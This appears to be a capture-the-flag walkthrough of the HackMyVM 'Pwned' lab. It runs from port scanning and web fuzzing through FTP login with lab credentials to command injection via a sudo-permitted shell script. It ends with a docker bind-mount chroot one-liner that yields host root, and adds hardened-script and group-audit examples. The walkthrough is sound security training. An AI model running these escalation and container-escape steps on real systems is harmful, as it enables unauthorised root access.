Table of Contents
Information Gathering
arp
nmap
nikto
whatweb
WEB
Web information gathering
dirsearch
wfuzz
FTP
SSH connection
Privilege Escalation
get user
System enumeration
Lateral movement
Information Gathering
arp
┌─[root@parrot]─[~/HackMyVM]
└──╼ #arp-scan -l
Interface: enp0s3, type: EN10MB, MAC: 08:00:27:16:3d:f8, IPv4: 192.168.9.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.112 08:00:27:e4:dc:38 PCS Systemtechnik GmbH
nmap
Port enumeration
┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -p- 192.168.9.112 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 10:55 GMT
Nmap scan report for 192.168.9.112
Host is up (0.00060s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:E4:DC:38 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 38.77 seconds
Service enumeration
┌─[root@parrot]─[~/HackMyVM]
└──╼ #nmap -sC -sV -O -p 21,22,80 192.168.9.112 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-15 10:57 GMT
Nmap scan report for 192.168.9.112
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:E4:DC:38 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.14 seconds
nikto
┌─[roolting@parrot]─[~]
└──╼ $nikto -h http://192.168.9.112/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.9.112
+ Target Hostname: 192.168.9.112
+ Target Port: 80
+ Start Time: 2024-04-15 11:06:32 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /nothing/: Directory indexing found.
+ /robots.txt: Entry '/nothing/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: bf9, size: 5a9c7ca4a3440, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8103 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2024-04-15 11:06:59 (GMT0) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
whatweb
┌─[roolting@parrot]─[~]
└──╼ $whatweb -v http://192.168.9.112/
WhatWeb report for http://192.168.9.112/
Status : 200 OK
Title : Pwned....!!
IP : 192.168.9.112
Country : RESERVED, ZZ
Summary : Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.38 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.4.38 (Debian) (from server string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Mon, 15 Apr 2024 11:07:58 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Mon, 06 Jul 2020 15:47:21 GMT
ETag: "bf9-5a9c7ca4a3440-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 692
Connection: close
Content-Type: text/html
Three services: FTP, SSH and HTTP. Start with port 80, fall back to 21, and treat 22 as the last resort (no credentials or keys yet).
WEB
Web information gathering
The homepage itself offers nothing useful, so we enumerate directories.
dirsearch
┌─[✗]─[root@parrot]─[~/HackMyVM]
└──╼ #dirsearch -u http://192.168.9.112/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x 403,404
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 207628
Output File: /root/HackMyVM/reports/http_192.168.9.112/__24-04-15_12-51-01.txt
Target: http://192.168.9.112/
[12:51:01] Starting:
[12:51:23] 301 - 316B - /nothing -> http://192.168.9.112/nothing/
[12:59:30] 301 - 320B - /hidden_text -> http://192.168.9.112/hidden_text/
Task Completed
/nothing is a dead end.
/hidden_text/ exposes a file named secret.dic, which looks like a wordlist. Download it and use it to fuzz for further paths.
┌─[root@parrot]─[~/HackMyVM]
└──╼ #wget http://192.168.9.112/hidden_text/secret.dic
--2024-04-15 13:01:31-- http://192.168.9.112/hidden_text/secret.dic
Connecting to 192.168.9.112:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 211
Saving to: 'secret.dic'
secret.dic 100%[=================================================>] 211 --.-KB/s in 0s
2024-04-15 13:01:31 (54.5 MB/s) - 'secret.dic' saved [211/211]
wfuzz
┌─[root@parrot]─[~/HackMyVM]
└──╼ #wfuzz -w secret.dic -u http://192.168.9.112/FUZZ -t 100 --hc 403,404
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.9.112/FUZZ
Total requests: 22
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000022: 200 75 L 191 W 3065 Ch "http://192.168.9.112/"
000000017: 301 9 L 28 W 319 Ch "/pwned.vuln"
Total time: 0
Processed Requests: 22
Filtered Requests: 20
Requests/sec.: 0
Following the /pwned.vuln lead, we recover a set of credentials:
ftpuser:B0ss_B!TcH
FTP
┌─[root@parrot]─[~/HackMyVM]
└──╼ #ftp 192.168.9.112
Connected to 192.168.9.112.
220 (vsFTPd 3.0.3)
Name (192.168.9.112:roolting): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||42404|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||47179|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 .
drwxrwxrwx 3 0 0 4096 Jul 09 2020 ..
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
226 Directory send OK.
The share directory contains id_rsa and note.txt. Download both:
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||36811|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |***************************************************************************| 2602 5.02 KiB/s 00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (5.00 KiB/s)
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||30095|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |***************************************************************************| 75 64.24 KiB/s 00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (39.35 KiB/s)
┌─[root@parrot]─[~/HackMyVM]
└──╼ #cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
This is an SSH private key, and note.txt names the user it belongs to: ariana. Set the key to mode 600 (OpenSSH refuses a private key readable by others) and log in with it directly.
SSH connection
Privilege Escalation
get user
System enumeration
ariana@pwned:/home$ cat messenger.sh
#!/bin/bash
clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "
$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""
This script stands out: the "message" read from the user is expanded unquoted and executed as a command ($msg 2> /dev/null), so whoever types the message runs arbitrary commands with the script's privileges. Check what sudo lets us do with it:
ariana@pwned:/home$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh
So ariana may run /home/messenger.sh as selena without a password. Combined with the command execution in the script, that is arbitrary command execution as selena.
sudo -u selena ./messenger.sh
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : ariana
Enter message for ariana :ls -al /home/selena
Sending message to ariana
total 24
drwxrwx--- 3 selena root 4096 Jul 10 2020 .
drwxr-xr-x 5 root root 4096 Jul 10 2020 ..
-rw------- 1 selena selena 1 Jul 10 2020 .bash_history
drwxr-xr-x 3 selena selena 4096 Jul 9 2020 .local
-rw-r--r-- 1 selena selena 132 Jul 10 2020 selena-personal.diary
-rw-r--r-- 1 selena selena 100 Jul 10 2020 user2.txt
Message sent to ariana :)
No password was asked for, and the "message" ran as selena: /home/selena is mode 770 owned by selena:root, so ariana could not list it herself, yet the listing came back. The same trick runs any command as selena.
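To make the defect concrete, here is the vulnerable pattern from messenger.sh beside a hardened version. This is an added example, not code from the original writeup or from the target; the spool directory and the recipient-name allow-list are assumptions made for the demo.

```shell
#!/bin/bash
# Added example, not from the original writeup: the command-execution defect in
# /home/messenger.sh reproduced as a function, beside a hardened replacement.
# SPOOL_DIR and the recipient-name rule are assumptions made for this demo.

# Vulnerable: mirrors the original script's `$msg 2> /dev/null`. The unquoted
# expansion is word-split and the first word is run as a command, so whoever
# types the "message" runs arbitrary commands as the script's effective user
# (selena, via the NOPASSWD sudo rule on the target).
send_unsafe() {
    local name="$1" msg="$2"
    echo "Sending message to $name" >&2
    $msg 2> /dev/null
}

# Hardened: the message is treated strictly as data and appended to a per-
# recipient spool file; it is never expanded or executed. The recipient name is
# checked against a conservative allow-list before being used in a path, so it
# cannot traverse directories or smuggle shell metacharacters.
SPOOL_DIR="${SPOOL_DIR:-$(mktemp -d)}"

send_safe() {
    local name="$1" msg="$2"
    case "$name" in
        ""|*[!a-z0-9_-]*)
            echo "invalid recipient: $name" >&2
            return 1 ;;
    esac
    printf '%s\n' "$msg" >> "$SPOOL_DIR/$name.msg"
}

# Read back what a recipient has received (used by the demo and tests).
read_messages() {
    cat -- "$SPOOL_DIR/$1.msg"
}

# Demo: the same "message" is a command in one version and plain text in the other.
send_unsafe ariana 'id -un'            # prints the current user: the input ran
send_safe   ariana 'id -un'            # stores the literal string
read_messages ariana                   # prints: id -un
```

The fix is not about filtering "dangerous" commands; it is about never handing user input to the shell for expansion. Anything that still wants a sudo rule for this script should also point it at a root-owned, non-writable path rather than a file under /home.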
Lateral movement
payload
The docker payload below needs access to the Docker daemon (normally membership of the docker group). It bind-mounts the host's root filesystem at /mnt inside an Alpine container and chroots into it, so the shell that comes back is a root shell on the host:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
#
Done. The last flag is in /root.
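Since the payload only works for an account that can talk to the Docker daemon, a quick audit of root-equivalent group memberships is worth keeping at hand. This is an added example, not part of the original writeup; the /etc/group lines are constructed sample data (the target's group file is not shown above), and the list of groups treated as root-equivalent is the author's assumption.

```shell
#!/bin/bash
# Added example, not from the original writeup: list accounts whose group
# membership is effectively root. The /etc/group content below is constructed
# sample data; the target's real group file is not shown in the writeup.

SAMPLE_GROUP='root:x:0:
sudo:x:27:ariana
docker:x:998:selena
lxd:x:999:
disk:x:6:
users:x:100:ariana,selena,ftpuser'

# Groups that amount to root on most hosts (assumption for this audit):
#   docker - can bind-mount / into a container and chroot (the payload above)
#   lxd    - same trick with a privileged LXD container
#   disk   - raw read/write access to block devices, hence every file
#   sudo / wheel - root-equivalent unless sudoers restricts them (as it does
#                  for ariana on this box)
ROOT_EQUIV_GROUPS='docker lxd disk sudo wheel'

# Print "group:user" for each member of a root-equivalent group.
# Usage on a live host: root_equiv_members "$(cat /etc/group)"
root_equiv_members() {
    local groupdb="$1"
    printf '%s\n' "$groupdb" | awk -F: -v want="$ROOT_EQUIV_GROUPS" '
        BEGIN { n = split(want, w, " "); for (i = 1; i <= n; i++) want_set[w[i]] = 1 }
        ($1 in want_set) && $4 != "" {
            m = split($4, users, ",")
            for (j = 1; j <= m; j++) print $1 ":" users[j]
        }'
}

# Return 0 when the given user is a member of the docker group in the group db.
# Usage: in_docker_group selena "$(cat /etc/group)"
in_docker_group() {
    local user="$1" groupdb="$2"
    root_equiv_members "$groupdb" | grep -qx -- "docker:$user"
}

root_equiv_members "$SAMPLE_GROUP"
# sudo:ariana
# docker:selena
```

On a live host, also check who can write to the daemon socket (ls -l /var/run/docker.sock): it is the socket's owning group and mode, not the name "docker", that actually grants access.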